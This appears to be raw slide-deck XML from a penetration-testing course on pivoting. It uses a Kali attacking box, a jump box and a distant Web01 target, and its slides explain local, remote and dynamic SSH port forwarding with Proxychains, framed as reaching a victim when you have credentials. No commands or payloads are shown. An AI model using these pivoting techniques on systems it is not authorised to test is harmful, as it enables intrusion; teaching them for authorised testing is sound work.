            <a:xfrm>
              <a:off x="2840797" y="2183244"/>
              <a:ext cx="6510404" cy="40015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10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BFEA92E-8785-44E0-9503-E91C5278B3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254876" y="3171263"/>
            <a:ext cx="6537872" cy="2619576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5949514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E144EE-9F96-41C5-946F-36933B51F3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03CBEDB-A9AA-4F79-830E-FED036645185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Note on Coloring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4671D3B3-EB85-474B-89FE-EA230678FAD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>For the following slides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The attacking box is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The first accessible box (i.e., jump box) is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GREEN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Distant (or nearby based on context) boxes are in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PEACH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF45D46-5186-4820-86DF-991B51E19C47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1960326" y="3803231"/>
            <a:ext cx="8271347" cy="2372790"/>
            <a:chOff x="1960326" y="3341589"/>
            <a:chExt cx="8271347" cy="2372790"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Brace 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C75F7375-DC74-4DDB-B63D-A9C4CC936395}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5864789" y="689027"/>
              <a:ext cx="470436" cy="6407581"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 185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F4437582-00D3-4908-B395-468A245100E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1960326" y="3828429"/>
              <a:ext cx="8271347" cy="1885950"/>
              <a:chOff x="1803129" y="4449866"/>
              <a:chExt cx="8271347" cy="1885950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="7" name="Group 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948951DB-C75C-4128-B3B6-929483F802BB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1803129" y="4449866"/>
                <a:ext cx="8271347" cy="1885950"/>
                <a:chOff x="1803129" y="4428942"/>
                <a:chExt cx="8271347" cy="1885950"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="9" name="Group 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3652650D-5645-44D3-9809-156F8E71F30A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="1803129" y="4428942"/>
                  <a:ext cx="8271347" cy="1885950"/>
                  <a:chOff x="1606526" y="4354294"/>
                  <a:chExt cx="8271347" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="12" name="Group 11">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F32467C-C103-4A07-A6F5-7256E3BAB47C}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="4794238" y="4354294"/>
                    <a:ext cx="1885950" cy="1885950"/>
                    <a:chOff x="5314594" y="2581275"/>
                    <a:chExt cx="1885950" cy="1885950"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="17" name="Rectangle 16">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE9C169-F585-4DE5-BF29-DE696E75CE7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8" name="Graphic 17" descr="Monitor with solid fill">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F6F133-4D7E-4BEE-A49C-DEA9B1913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13" name="Graphic 12" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E7C299D-840F-48F4-98F4-BE4B0B926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6526" y="4354294"/>
                    <a:ext cx="1885950" cy="1885950"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </p:spPr>
              </p:pic>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="14" name="Group 13">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03909E2D-060D-4E41-B02C-5BDC2E3C4FAF}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="7991923" y="4354294"/>
                    <a:ext cx="1885950" cy="1885950"/>
                    <a:chOff x="5314594" y="2581275"/>
                    <a:chExt cx="1885950" cy="1885950"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="15" name="Rectangle 14">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2ACE6E4-A35A-4F98-8191-704355876B37}"/>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6" name="Graphic 15" descr="Monitor with solid fill">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B0E4329-C4E6-42E1-B624-DCC556DFEE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594" y="2581275"/>
                      <a:ext cx="1885950" cy="1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </p:spPr>
                </p:pic>
              </p:grpSp>
            </p:grpSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="11" name="Straight Connector 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C2939D-A4A7-4F62-A29B-529134BBBB3F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3689079" y="5249784"/>
                  <a:ext cx="1382678" cy="19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C120EB03-AB65-4D4D-92C0-65004916711C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="6841320" y="5254067"/>
                <a:ext cx="1382678" cy="19987"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent5">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F790FA6-76BF-410C-B159-C5958F6A44EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3604334" y="3341589"/>
              <a:ext cx="10293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Distant</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Right Brace 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11BE79DA-A37A-4EA6-B475-00534DDF8FF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7455784" y="2069218"/>
              <a:ext cx="692418" cy="3411982"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 53422"/>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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D28532FA-6999-4428-9C70-FAABA27C42DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7387390" y="3550194"/>
            <a:ext cx="10293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Nearby</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7DEE699-92F6-4457-AF1A-92E792ECB460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381557" y="4909606"/>
            <a:ext cx="10293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Kali</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E31917E-FF77-4A36-A37F-35367803C935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534260" y="4926247"/>
            <a:ext cx="11234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Client01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5C89E9-B553-4BB9-A731-F6CD0A90541C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8774039" y="4936240"/>
            <a:ext cx="10293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Web01</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164201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75ABE-257D-42F8-B6CE-CE1987E44E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25CDC6F-5567-4ADD-87AE-A9A1AF4DD4AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8668AB35-B44A-4313-AE82-7A8401692629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Three main types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Local</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Designating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> port to be mapped to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>remote host and port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>remote host (e.g., jump box)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Designating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> port to be mapped to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>local or nearby host and port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Route local traffic through a single port to any other port on the remote side – often used with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21477178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30FEB-1270-447D-8061-407B32DC91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B9D370-9F7C-4349-884D-58FE7402F4AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA91E8A-3591-4DEB-8759-F6FC19CB7106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful When:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Inbound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SSH is allowed on the interesting machine (often the victim) and you have creds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B222A8-3D8C-48A6-83CB-844190D3294D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2908288" y="2800350"/>
            <a:ext cx="6375424" cy="1885950"/>
            <a:chOff x="2787270" y="3400425"/>
            <a:chExt cx="6375424" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCB372CB-C768-4F36-9A14-8A3CE39ED061}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7276744" y="3400425"/>
              <a:ext cx="1885950" cy="1885950"/>
              <a:chOff x="5314594" y="2581275"/>
              <a:chExt cx="1885950" cy="1885950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440BCD47-8661-4E58-9577-431526DE9FFF}"/>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8" name="Graphic 7" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA620D4-4D74-4DE2-8E82-07F873465F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9" name="Graphic 8" descr="Monitor with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8319C425-951E-461B-A990-9D9B5A5885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7270" y="3400425"/>
              <a:ext cx="1885950" cy="1885950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF199D16-1152-453B-BF15-17D128453910}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6962350" y="4059793"/>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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Graphic 16" descr="Target outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A79DE11-26AF-4951-A213-BBE5DF7049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519" y="3743143"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56835B38-E70E-4B80-9C03-4383B542349C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7882630" y="3877177"/>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80</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9B250BFD-7614-442E-9066-E86BE20BC673}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4822291" y="4242435"/>
              <a:ext cx="2032380" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">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6218907-5432-4848-93C6-97137F8C5869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1803129" y="4449866"/>
            <a:ext cx="8271347" cy="1885950"/>
            <a:chOff x="1803129" y="4449866"/>
            <a:chExt cx="8271347" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D911ABA9-8D71-44EB-94C5-099ACF4DBDC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1803129" y="4449866"/>
              <a:ext cx="8271347" cy="1885950"/>
              <a:chOff x="1803129" y="4428942"/>
              <a:chExt cx="8271347" cy="1885950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Group 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4ADDE4C-DD54-4BF2-9686-81058EEA9DE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1803129" y="4428942"/>
                <a:ext cx="8271347" cy="1885950"/>
                <a:chOff x="1606526" y="4354294"/>
                <a:chExt cx="8271347" cy="1885950"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="22" name="Group 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
